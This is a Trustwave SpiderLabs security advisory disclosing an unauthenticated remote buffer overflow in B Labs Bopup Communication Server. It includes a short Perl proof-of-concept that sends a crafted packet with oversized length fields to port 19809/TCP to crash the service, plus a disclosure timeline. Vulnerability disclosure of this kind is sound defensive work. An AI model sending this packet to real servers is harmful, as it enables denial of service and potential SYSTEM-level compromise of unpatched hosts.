Trustwave SpiderLabs Security Advisory TWSL2016-020: Buffer Overflow Vulnerability in B Labs Bopup Communication Server Published: 11/03/2016 Version: 1.0 Vendor: B Labs (http://www.bopup.com/) Product: Bopup Communication Server Version affected: <= 4.5.3.13001 Product description: Bopup Communication Server is a secure messaging suite designed to provide efficient and private communication over networks of any size. The server meets most of the critical business needs, such as centralized management, the Active Directory (LDAP) support, message and file transfer logging. Finding 1: Remote un-authenticated buffer overflow Credit: Neil Kettle of Trustwave Bopup Communications Server contains a remotely exploitable buffer overflow in handling and parsing of packets to the remote administration port (19809/TCP) prior to authentication. Through this, an attacker can execute arbitrary code on the remote host with the privileges of the Bopup Communications Server, namely SYSTEM. The issue occurs due to a lack of bounds validation in several calls to memcpy with user-definable lengths with the destination buffer allocated on the stack. The following Proof of Concept (PoC) builds a packet which when sent to the remote service causes an access violation to occur in the processing of the packet. ## bopup-poc.pl $buf = "\x79\xDF\x32\x01"; send(SOCKET, $buf, 0); $buf = "\x9D\x00\x00\x00"; # op code $buf .= "\x80\x14\x00\x00"; # total length $buf .= "\x80\x14\x00\x00"; # smash length $buf .= "\x00\x00\x00\x00"; # extra length $buf .= "\x00\x00\x00\x00"; send(SOCKET, $buf, 0); $buf = "A" x 0x1480; send(SOCKET, $buf, 0); Remediation Steps: There is no official fix. However, this issue can be mitigated with the use of technologies, such as an Intrusion Prevention System (IPS). Vulnerability Scanners and Intrusion Detection Systems (IDS) may detect the presence of the vulnerability. Trustwave has added coverage for its IDS/IPS platform. Revision History: 07/14/2016 - Attempt to contact vendor 09/16/2016 - Attempt to contact vendor 10/14/2016 - Final Attempt to contact vendor 11/03/2016 - Advisory published About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.